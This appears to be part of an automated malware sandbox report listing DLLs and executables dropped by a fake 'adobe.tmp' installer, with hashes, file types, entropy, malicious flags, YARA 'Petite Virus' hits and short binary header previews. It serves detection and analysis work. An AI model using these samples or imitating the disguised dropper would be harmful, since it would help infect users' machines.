                                                                                                                                                        SSDEEP:384:dz7otnjFa4ECX3yeGjA+tSXGnUav92hca+XWRlsuG+is:po7GU+szS3W7sQ7
                                                                                                                                                        MD5:8EE91149989D50DFCF9DAD00DF87C9B0
                                                                                                                                                        SHA1:E5581E6C1334A78E493539F8EA1CE585C9FFAF89
                                                                                                                                                        SHA-256:3030E22F4A854E11A8AA2128991E4867CA1DF33BC7B9AFF76A5E6DEEF56927F6
                                                                                                                                                        SHA-512:FA04E8524DA444DD91E4BD682CC9ADEE445259E0C6190A7DEF82B8C4478A78AAA8049337079AD01F7984DBA28316D72445A0F0D876F268A062AD9B8FF2A6E58D
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...................................D.... ..PE..L....+vS...........!....6...6.......6........p......................................................................0..........P.......@...................tM.......................................................................................................>..................`....rsrc...........@....H..............@..@....................................@...........6...........................`.......................................D...n'......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!......f.`P....h.5..j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X............f.......Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I..K..........(...|...}K...................E..K....p..j...g........Q..........y...........
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):967168
                                                                                                                                                        Entropy (8bit):6.500850562754145
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:j2ezAN6FpYQSzclODziLQEkkDHFb1aWGssVvVmPUwV+SiRm7rhj:jhAgFptPlqmPDHJ1apVdYUy+jRmX
                                                                                                                                                        MD5:C06D6F4DABD9E8BBDECFC5D61B43A8A9
                                                                                                                                                        SHA1:16D9F4F035835AFE8F694AE5529F95E4C3C78526
                                                                                                                                                        SHA-256:665D47597146DDAAA44B771787B750D3CD82C5B5C0B33CA38F093F298326C9BB
                                                                                                                                                        SHA-512:B0EBE9E2682A603C34F2B884121FA5D2D87ED3891990CCD91CD14005B28FE208A3B86FA20E182F9E7FC5142A267C8225AEFDCB23CF5B7556D2CF8F9E3BDE62D4
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.~..m...m...m......m.....m......m.......m..)3...m..)3...m..)3...m.......m...m..rm...m..m..3...m..3...m..3...m..Rich.m..........................PE..L...8..^...........!.........&.......`....................................................@..........................4.......G..<...............................HR..P+..T............................+..@...............D............................text............................... ..`.rdata..............................@..@.data........P...$...D..............@....trace.......`.......h..............@..@.gfids...............~..............@..@_RDATA..@...........................@..@.debug_o............................@..B.rsrc................l..............@..@.reloc..HR.......T...n..............@..B................................................................................................................
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):36752
                                                                                                                                                        Entropy (8bit):7.780431937344781
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:E7epCl6I8YbTvEKXQ2vm+iocmmMt7KjuDnlVahRlmftuY5B:EepUv8aZvmd+7nDDalauy
                                                                                                                                                        MD5:9FF783BB73F8868FA6599CDE65ED21D7
                                                                                                                                                        SHA1:F515F91D62D36DC64ADAA06FA0EF6CF769376BDF
                                                                                                                                                        SHA-256:E0234AF5F71592C472439536E710BA8105D62DFA68722965DF87FED50BAB1816
                                                                                                                                                        SHA-512:C9D3C3502601026B6D55A91C583E0BB607BFC695409B984C0561D0CBE7D4F8BD231BC614E0EC1621C287BF0F207017D3E041694320E692FF00BC2220BFA26C26
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.........n.......................................................B....@.........................P...........d.......@............s.......x..........................................................8............................................j..................@..@.rsrc.... ...........l..............@..@petite...............p..............`..`..................8..u...I.x|}...g{...@..ffe.c4.-.Bj..........U.J.`..s.N:`..I@;..B.kbmj..E%2. `....".]&.&.).BB...E..4u'.....Q.......%....V.............5...y....E..q<w.....j...B..O...p....*.X...m...= .X..........4........~~.8.F@.V...6....;?.5..)S.m.9U......^.zO!1o.F.E. ...H=`2...9.(...4).E.!G..;R.1.#.h0..(*..t8..O...Td.d..~...l.a..U...b<../..W....M6...U*G..II.x........>..I[...v.N/.V..3..Y.c...Zh.i..i.....n....M..D....5o."....(.9.+..z...._$t.T...X#\...N....Q%...>U..|....J
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):35588
                                                                                                                                                        Entropy (8bit):7.817557274117395
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:dCrMZHv56WRldhmLjQDrbfc8cznHvc6modHQ:sAR0LzHvc6m2HQ
                                                                                                                                                        MD5:58521D1AC2C588B85642354F6C0C7812
                                                                                                                                                        SHA1:5912D2507F78C18D5DC567B2FA8D5AE305345972
                                                                                                                                                        SHA-256:452EEE1E4EF2FE2E00060113CCE206E90986E2807BB966019AC4E9DEB303A9BD
                                                                                                                                                        SHA-512:3988B61F6B633718DE36C0669101E438E70A17E3962A5C3A519BDECC3942201BA9C3B3F94515898BB2F8354338BA202A801B22129FC6D56598103B13364748C1
                                                                                                                                                        Malicious:false
                                                                                                                                                        Yara Hits:
                                                                                                                                                        • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-SD2K4.tmp, Author: Joe Security
                                                                                                                                                        Preview:MZ......................@...................................D.... ..PE..L.....yX...........!.................@.......................................P............@.........................PB.......A..d.... ..@...................P........................................................A..8...............................................................@..@.rsrc........ ......................@..@.............0.........................@petite.......@......................`..`...................................._3.....g.ge..7t...R-_.R.@c.S.\..J?L.EZ.,....=H8..;.QJ.....P-)eFs93:.^...f......}..?...e...SD.......-.u.......q2...P...6..z5.T.S..P..Q....@..Mq.>....8" F...,..FE...S.[U..c......jr....b...-%...`......w..+W.C......]..#......LS....W.Y....o.8...i.[)..%(.2.t...YY .bL.....b.@&J,?l.........$..F..&...a#.\[".^...&]co....K.>...xQzw..XW.uT..+dm.o.b...@c....3..r....@]...P........{C/.....A!.&..........'....._..."S..&..F.......:.dxtK.6...7.I...Q..Nm2.....NX..fG..L..7.?..".(
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):7910
                                                                                                                                                        Entropy (8bit):6.931925007191986
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:piDl1jKrGer007ia6abHX0d/aeHeN+VPHIJQxNiJCl9AK0f:IDJ9aDb30dCe+4PHIJrJCl9AK0f
                                                                                                                                                        MD5:1268DEA570A7511FDC8E70C1149F6743
                                                                                                                                                        SHA1:1D646FC69145EC6A4C0C9CAD80626AD40F22E8CD
                                                                                                                                                        SHA-256:F266DBA7B23321BF963C8D8B1257A50E1467FAAAB9952EF7FFED1B6844616649
                                                                                                                                                        SHA-512:E19F0EA39FF7AA11830AF5AAD53343288C742BE22299C815C84D24251FA2643B1E0401AF04E5F9B25CAB29601EA56783522DDB06C4195C6A609804880BAE9E9B
                                                                                                                                                        Malicious:false
                                                                                                                                                        Yara Hits:
                                                                                                                                                        • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-TA1T4.tmp, Author: Joe Security
                                                                                                                                                        Preview:MZ......................@...................................D.... ..PE..L.....V...........!.................p.......0............................................@.........................Pr.......q..d....P.......................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`.........................................|7{M..... ........r B`.Zr..P.........T}.e..YJ...=.X..q.}......b.I...G.....^.d...R..-R.....d_.......K.q.H.A=.-S..,_.....L...........2.............u.u.%...:.q....c.[.....`...\.X..8..B.@L..3.7.q.....)!.- ...D.....p...J...RU..Q.A..[.#&..R.....".+4...px/7..\....4...., ..8...5.hV.>] ....3.-.<..I+.<r..T..H,Q..!..i--..+.Zq.[...H... ...N.8..#...a.x.iU.G..-_..R....Z(cT%.....S.P.U:g?...;....&....@..KI.X.Q..PQ..v..*....{..~..}..f....c..`....Q...q..%......,j.4.Y..)....Cf7..
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):16910
                                                                                                                                                        Entropy (8bit):5.289608933932413
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:ohtyjknGC7hipL+9mLYFOozxkdlDNUwS5Qq:UGknGC74l+MUFI7C
                                                                                                                                                        MD5:2F040608E68E679DD42B7D8D3FCA563E
                                                                                                                                                        SHA1:4B2C3A6B8902E32CDA33A241B24A79BE380C55FC
                                                                                                                                                        SHA-256:6B980CADC3E7047CC51AD1234CB7E76FF520149A746CB64E5631AF1EA1939962
                                                                                                                                                        SHA-512:718AF5BE259973732179ABA45B672637FCA21AE575B4115A62139A751C04F267F355B8F7F7432B56719D91390DABA774B39283CBCFE18F09CA033389FB31A4FC
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........B.........#.........>...f...........0.....h......................... ................ .........................{.......|...............................$...........................pA.......................................................text...4...........................`.P`.data...<....0......."..............@.0..rdata.......@.......$..............@.`@/4...........P.......(..............@.0@.bss.....d...`........................`..edata..{............2..............@.0@.idata..|............4..............@.0..CRT....,............:..............@.0..tls.................<..............@.0..reloc..$............>..............@.0B................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):36416
                                                                                                                                                        Entropy (8bit):7.842278356440954
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:lshkyPXvH6bPACtmb8boNQdVfCXewki/OvXEApOqmFfSq1oIQMW:lsh3n5Pb8boOdVCuwNEXEAonfSq1JQb
                                                                                                                                                        MD5:BEBA64522AA8265751187E38D1FC0653
                                                                                                                                                        SHA1:63FFB566AA7B2242FCC91A67E0EDA940C4596E8E
                                                                                                                                                        SHA-256:8C58BC6C89772D0CD72C61E6CF982A3F51DEE9AAC946E076A0273CD3AAF3BE9D
                                                                                                                                                        SHA-512:13214E191C6D94DB914835577C048ADF2240C7335C0A2C2274C096114B7B75CD2CE13A76316963CCD55EE371631998FAC678FCF82AE2AE178B7813B2C35C6651
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...................................D.... ..PE..L....}.Q...........!................6 ............`..........................0......................................d#.......!..........@...................t...........................................................................................................................`....rsrc...........@...................@..@....................................@................ ......................`.......................................X...{.......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!... c.f.`P....h.p..j..P..C.h..`..<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I.....................]...............'..................................A...%...........
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):967168
                                                                                                                                                        Entropy (8bit):6.500850562754145
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:j2ezAN6FpYQSzclODziLQEkkDHFb1aWGssVvVmPUwV+SiRm7rhj:jhAgFptPlqmPDHJ1apVdYUy+jRmX
                                                                                                                                                        MD5:C06D6F4DABD9E8BBDECFC5D61B43A8A9
                                                                                                                                                        SHA1:16D9F4F035835AFE8F694AE5529F95E4C3C78526
                                                                                                                                                        SHA-256:665D47597146DDAAA44B771787B750D3CD82C5B5C0B33CA38F093F298326C9BB
                                                                                                                                                        SHA-512:B0EBE9E2682A603C34F2B884121FA5D2D87ED3891990CCD91CD14005B28FE208A3B86FA20E182F9E7FC5142A267C8225AEFDCB23CF5B7556D2CF8F9E3BDE62D4
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.~..m...m...m......m.....m......m.......m..)3...m..)3...m..)3...m.......m...m..rm...m..m..3...m..3...m..3...m..Rich.m..........................PE..L...8..^...........!.........&.......`....................................................@..........................4.......G..<...............................HR..P+..T............................+..@...............D............................text............................... ..`.rdata..............................@..@.data........P...$...D..............@....trace.......`.......h..............@..@.gfids...............~..............@..@_RDATA..@...........................@..@.debug_o............................@..B.rsrc................l..............@..@.reloc..HR.......T...n..............@..B................................................................................................................
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):506871
                                                                                                                                                        Entropy (8bit):7.998074018431883
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:12288:VCtY2iynJj4iqp1WjsxlD71zFusqzKZXGky4H2po:V+Y1y7qp0oxF7T3ZXGky4Wq
                                                                                                                                                        MD5:D52F8AE89AC65F755C28A95C274C1FFE
                                                                                                                                                        SHA1:50D581469FF0648EE628A027396F39598995D8B0
                                                                                                                                                        SHA-256:2F9A9DFD0C0B0CFAF9C700B4659A4F2F3D11368E6C30A3FA0F93ECDD3B4D2E66
                                                                                                                                                        SHA-512:B7B585EED261C262499C73688DFD985818F7869319285168AEEAC1F2CF5FAD487280FCAE1DAC633296E5DB0E0BC454495A09A90C2E37A7E7AF07EF93563503C6
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK...........N..UD...."....$.AddWindowsExplorerShortcut.exe.. ..........p.../..L..../..L..../...Ykl...>3..f...6I..!7..qL.......Y;...M.HJ\....z....Y?R.B+P...*."......US.R.SB....i.....T.R.....**..3./;/..Q.].{....:s=t.c....|>...%....v:.Ot.....7.....il.rY^..4r.4.Gxl.3Yp...Q....X.".%......B......q..]k..7ae.O.....;..u.n....b..<............ w,.L'O.&...^.OJ...WT.X?RQOx|...}MA.n*.].q:!]iB`....|VW.!.@Br[...N.Xl....f....GH..~..h.......:zZ..'. ..n..._.......Gw../.X...t$$...Z.7...&X...[V.e..p..&z..-Wj.r...ku...VKg.t.5.......,.[.,G........w...}...6.rD.EN.#..uu...kb..5"..gL.>.....D.....N..!...1.o*..j..tD.!....H.X......a...._Fw..SQ~u{...4.to..7a.rrkT[.F.......nkV.....Sqc..f..gW..9Y.'.....L....U....\'=$...h...a...y...).?......Z......Z.l....+.b...O...h^.._..k......l._Q..m....w..s.eGm.=.nP..v57....H.U..6hQ~98z.A.'.z..H&...=.R.6..B'l...h...l....d]%./....<>....~....@..=....7...T0..J;.J....o.[.O..*..P.....'.k.......:.i.Bu.)...P#......^.....Jy.(o..:.?.......]./........
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):512014
                                                                                                                                                        Entropy (8bit):6.566561154468342
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:BNKab1bu1dEpBZvkO4KTYnyA0bFHmufLKNs3gv:rKcozEpbvkOCyA0xGufLKau
                                                                                                                                                        MD5:C4A2068C59597175CD1A29F3E7F31BC1
                                                                                                                                                        SHA1:89DE0169028E2BDD5F87A51E2251F7364981044D
                                                                                                                                                        SHA-256:7AE79F834A4B875A14D63A0DB356EEC1D356F8E64FF9964E458D1C2050E5D180
                                                                                                                                                        SHA-512:0989EA9E0EFADF1F6C31E7FC243371BB92BFD1446CF62798DCA38A021FAD8B6ADB0AEABDFBDC5CE8B71FE920E341FC8AB4E906B1839C6E469C75D8148A74A08A
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P/.d...........#...(.l.........................n.........................P............@... ..........................:........... .......................0..L...........................d...........................P............................text....k.......l..................`..`.data................p..............@....rdata...t.......v...r..............@..@/4......L...........................@..@.bss....X................................edata...:.......<...j..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc........ ......................@....reloc..L....0......................@..B........................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):126478
                                                                                                                                                        Entropy (8bit):6.268811819718352
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3072:UnNKg6JaJUeHjiaphKMLrn8uexz3TmBUg6xcE:UNcJGGehKMLJBUg6x
                                                                                                                                                        MD5:6E93C9C8AADA15890073E74ED8D400C9
                                                                                                                                                        SHA1:94757DBD181346C7933694EA7D217B2B7977CC5F
                                                                                                                                                        SHA-256:B6E2FA50E0BE319104B05D6A754FE38991E6E1C476951CEE3C7EBDA0DC785E02
                                                                                                                                                        SHA-512:A9F71F91961C75BB32871B1EFC58AF1E1710BDE1E39E7958AE9BB2A174E84E0DD32EBAAB9F5AE37275651297D8175EFA0B3379567E0EB0272423B604B4510852
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....^...................p.....m.........................p......f......... .........................{.... ...............................P..............................X........................!...............................text....\.......^..................`.P`.data........p.......b..............@.`..rdata..h&.......(...d..............@.`@/4......\B.......D..................@.0@.bss..................................`..edata..{...........................@.0@.idata....... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):227328
                                                                                                                                                        Entropy (8bit):6.641153481093122
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:jtJXnqDMJgH50aKyumLCGTrS4ifbjoO88k:KqgHlKyumLCGTrS4inoZ
                                                                                                                                                        MD5:BC824DC1D1417DE0A0E47A30A51428FD
                                                                                                                                                        SHA1:C909C48C625488508026C57D1ED75A4AE6A7F9DB
                                                                                                                                                        SHA-256:A87AA800F996902F06C735EA44F4F1E47F03274FE714A193C9E13C5D47230FAB
                                                                                                                                                        SHA-512:566B5D5DDEA920A31E0FB9E048E28EF2AC149EF075DB44542A46671380F904427AC9A6F59FBC09FE3A4FBB2994F3CAEEE65452FE55804E403CEABC091FFAF670
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...e>.a...........#.........t...V.................e.........................@......1......... .........................#....................................0...............................).......................................................text...............................`.P`.data...............................@.`..rdata..d0.......2..................@.`@.eh_framd@...@...B..................@.0@.bss.....T............................`..edata..#............T..............@.0@.idata...............^..............@.0..CRT....,............d..............@.0..tls......... .......f..............@.0..reloc.......0.......h..............@.0B................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):394752
                                                                                                                                                        Entropy (8bit):6.662070316214798
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:uAlmRfeS+mOxv8bgDTuXU54l8WybBE36IpuIT9nxQPQnhH/a0CRdWqWJwGKp:zlm0S+SEuXU54NylJIJ9KPQnhilRsVJ
                                                                                                                                                        MD5:A4123DE65270C91849FFEB8515A864C4
                                                                                                                                                        SHA1:93971C6BB25F3F4D54D4DF6C0C002199A2F84525
                                                                                                                                                        SHA-256:43A9928D6604BF604E43C2E1BAB30AE1654B3C26E66475F9488A95D89A4E6113
                                                                                                                                                        SHA-512:D0834F7DB31ABA8AA9D97479938DA2D4CD945F76DC2203D60D24C75D29D36E635C2B0D97425027C4DEBA558B8A41A77E288F73263FA9ABC12C54E93510E3D384
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......KL...-d..-d..-d..U...-d..Be..-d.TEe..-d..-e.:-d..Ba..-d..B`..-d..Bg..-d..B`.c-d..Bd..-d..B...-d..Bf..-d.Rich.-d.........................PE..L.....b`...........!.....L..........+S.......`...............................P............@.................................L........... .................... ..\ ..$...............................@...@............`...............................text...NK.......L.................. ..`.rdata......`.......P..............@..@.data...............................@....rsrc... ...........................@..@.reloc..\ ... ..."..................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):68042
                                                                                                                                                        Entropy (8bit):6.090396152400884
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:RX3HAdi7wgCsL6dVSngk2IFm3ZJVRDBLRROBBKRzPm3YRiF+ixh:NHQpe6SnZQLjICPm3Ytib
                                                                                                                                                        MD5:5DDA5D34AC6AA5691031FD4241538C82
                                                                                                                                                        SHA1:22788C2EBE5D50FF36345EA0CB16035FABAB8A6C
                                                                                                                                                        SHA-256:DE1A9DD251E29718176F675455592BC1904086B9235A89E6263A3085DDDCBB63
                                                                                                                                                        SHA-512:08385DE11A0943A6F05AC3F8F1E309E1799D28EA50BF1CA6CEB01E128C0CD7518A64E55E8B56A4B8EF9DB3ECD2DE33D39779DCA1FBF21DE735E489A09159A1FD
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...&...........................d......................................@... ..............................0..t....`..P....................p.......................................................1..H............................text...d...........................`..`.data...L...........................@....rdata..\...........................@..@/4.......2.......4..................@..@.bss.....................................edata..............................@..@.idata..t....0......................@....CRT....0....@......................@....tls.........P......................@....rsrc...P....`......................@....reloc.......p......................@..B........................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):123406
                                                                                                                                                        Entropy (8bit):6.263889638223575
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1536:hnPkU1t2P2hHV5JG1YBBAUBEd8+poyez9djcx2/8s6UJqfxX+1XOAhbKzb3+d:xPu21IYyCTToE6c+6e+d
                                                                                                                                                        MD5:B49ECFA819479C3DCD97FAE2A8AB6EC6
                                                                                                                                                        SHA1:1B8D47D4125028BBB025AAFCA1759DEB3FC0C298
                                                                                                                                                        SHA-256:B9D5317E10E49AA9AD8AD738EEBE9ACD360CC5B20E2617E5C0C43740B95FC0F2
                                                                                                                                                        SHA-512:18617E57A76EFF6D95A1ED735CE8D5B752F1FB550045FBBEDAC4E8E67062ACD7845ADC6FBE62238C383CED5E01D7AA4AB8F968DC442B67D62D2ED712DB67DC13
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................R.......d>..........p....@...........................@......^........ ...............................@.4...................................................................................|.@.@............................text....Q.......R..................`.P`.data...\....p.......V..............@.@..rdata...a.......b...X..............@.`@/4..................................@.0@.bss.....c>...........................`..idata..4.....@.....................@.0..CRT....4.....@.....................@.0..tls..........@.....................@.0.................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):22542
                                                                                                                                                        Entropy (8bit):5.5875455203930615
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:RKAPwPQJgZd3rw0bGMtyz1fiaqmjj1nFY4j70UotV9mRyK:YPQJgZZwUGH1fJljj1+D18
                                                                                                                                                        MD5:E1C0147422B8C4DB4FC4C1AD6DD1B6EE
                                                                                                                                                        SHA1:4D10C5AD96756CBC530F3C35ADCD9E4B3F467CFA
                                                                                                                                                        SHA-256:124F210C04C12D8C6E4224E257D934838567D587E5ABAEA967CBD5F088677049
                                                                                                                                                        SHA-512:A163122DFFE729E6F1CA6EB756A776F6F01A784A488E2ACCE63AEAFA14668E8B1148BE948EB4AF4CA8C5980E85E681960B8A43C94B95DFFC72FCCEE1E170BD9A
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........X...............,...T...............@....@.......................................... .................................@...........................................................PU..........................P............................text....+.......,..................`.P`.data........@.......0..............@.`..rdata..0....P.......2..............@.0@/4...........`.......<..............@.0@.bss.........p........................`..idata..@............J..............@.0..CRT....4............T..............@.0..tls.................V..............@.0.................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):15374
                                                                                                                                                        Entropy (8bit):5.25938266470983
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:l0HhuwYqkoiCBJRgcsZQPCkWa/HI77wbcRODYCpes2n13dwczbUwS7RE8SD:lqhoqkVCXWgI77B0hGnLwczbUwSC8g
                                                                                                                                                        MD5:228EE3AFDCC5F75244C0E25050A346CB
                                                                                                                                                        SHA1:822B7674D1B7B091C1478ADD2F88E0892542516F
                                                                                                                                                        SHA-256:7ACD537F3BE069C7813DA55D6BC27C3A933DF2CF07D29B4120A8DF0C26D26561
                                                                                                                                                        SHA-512:7DFA06B9775A176A9893E362B08DA7F2255037DC99FB6BE53020ECD4841C7E873C03BAC11D14914EFDFE84EFEB3FB99745566BB39784962365BEEBDB89A4531B
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0....Xj.......................................... ......................p......................................................................P@......................................................text...$...........................`.P`.data...,....0......................@.0..rdata.......@....... ..............@.0@/4...........P......."..............@.0@.bss.........`........................`..edata.......p......................@.0@.idata...............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):25614
                                                                                                                                                        Entropy (8bit):6.0293046975090325
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:MiksLrrN6mRXYYYYYYYYYYYYYYYYYYYYYYYYYI9W0oM:zrHFYYYYYYYYYYYYYYYYYYYYYYYYY70N
                                                                                                                                                        MD5:B82364A204396C352F8CC9B2F8ABEF73
                                                                                                                                                        SHA1:20AD466787D65C987A9EBDBD4A2E8845E4D37B68
                                                                                                                                                        SHA-256:2A64047F9B9B07F6CB22BFE4F9D4A7DB06994B6107B5EA2A7E38FAFA9E282667
                                                                                                                                                        SHA-512:C8CAFA4C315CE96D41AD521E72180DF99931B5F448C8647161E7F9DCA29AA07213B9CCEF9E3F7FB5353C7B459E3DA620E560153BDBA1AB529C206330DBD26FF5
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........d.........#....."...`...............@.... g.................................a........ .........................@.......@...............................`............................c.......................................................text.... ......."..................`.P`.data........@.......&..............@.`..rdata.......`.......@..............@.0@/4...........p.......F..............@.0@.bss..................................`..edata..@............T..............@.0@.idata..@............V..............@.0..CRT....,............\..............@.0..tls.................^..............@.0..reloc..`............`..............@.0B................................................................................................................................................................................................................................
